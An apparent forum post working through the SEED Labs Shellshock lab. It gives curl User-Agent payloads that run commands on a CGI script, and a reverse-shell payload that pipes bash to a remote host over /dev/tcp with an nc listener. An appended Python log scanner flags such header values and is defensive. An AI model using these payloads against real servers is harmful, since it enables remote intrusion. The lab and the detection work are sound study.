I am trying to solve the SEED Labs Shellshock vulnerability lab. In it, I set the agent field with the command below:
curl -A "() {echo hello;}; Content_type: text/plain; echo; /bin/ls -l " http://localhost/cgi-bin/sample.cgi
The output is still the hello world that is placed inside the CGI script.
I tested the agent field by checking the environment variables. It was set to my command but not executed. Any suggestions as to why bash did not parse this as a function?
I finally found the answer myself: it was because of wrong syntax. The correct syntax is this:
curl -A '() { :;}; Content_type: text/plain; echo; /bin/ls -l'
And running a bash command to get a reverse shell looks like this:
curl -A '() { :;}; $(/bin/bash -i > /dev/tcp/your ip/9090 2>&1 0>&1'
http://yourwebsiteadrress/cgi-bin/your cgi file
Don't forget to make your machine listen on 9090 first with this, in a new terminal of course:
nc -l 9090 -v
Then you have the reverse shell
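
Added example, not part of the original post: a small scanner that flags requests like the ones above in a web server access log by looking for a Referer or User-Agent value that starts like a bash function definition. It assumes Apache's "combined" log format; the sample log lines, addresses and function names are constructed for illustration.

```python
import re

# Apache "combined" format:
# host ident user [time] "request" status bytes "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)
# A header value that begins like an exported bash function: "() {"
FUNC_PREFIX = re.compile(r'^\s*\(\s*\)\s*\{')

def trailing_text(value):
    """Return whatever follows the first '}' (the text after the function body)."""
    idx = value.find('}')
    return value[idx + 1:].strip('; ') if idx != -1 else ''

def scan(lines):
    """Return (host, field, trailing_text) for each suspicious header value."""
    hits = []
    for line in lines:
        m = COMBINED.match(line.strip())
        if not m:
            continue  # not a combined-format line
        for field in ("referer", "agent"):
            value = m.group(field).replace('\\"', '"')  # undo log escaping
            if FUNC_PREFIX.match(value):
                hits.append((m.group("host"), field, trailing_text(value)))
    return hits

# Constructed sample log lines (documentation IP ranges).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/sample.cgi HTTP/1.1" '
    '200 6 "-" "curl/7.68.0"',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/sample.cgi HTTP/1.1" '
    '200 6 "-" "() {echo hello;}; Content_type: text/plain; echo; /bin/ls -l "',
    '192.0.2.11 - - [01/Jan/2024:10:01:00 +0000] "GET /cgi-bin/sample.cgi HTTP/1.1" '
    '200 412 "-" "() { :;}; Content_type: text/plain; echo; /bin/ls -l"',
    '198.51.100.7 - - [01/Jan/2024:10:02:00 +0000] "GET /index.html HTTP/1.1" '
    '200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    for host, field, trailing in scan(SAMPLE):
        print(f"{host}: {field} looks like a function definition; trailing text: {trailing!r}")
```

Both the malformed first attempt and the corrected header are flagged, since either one in a log shows that someone is probing the CGI endpoint.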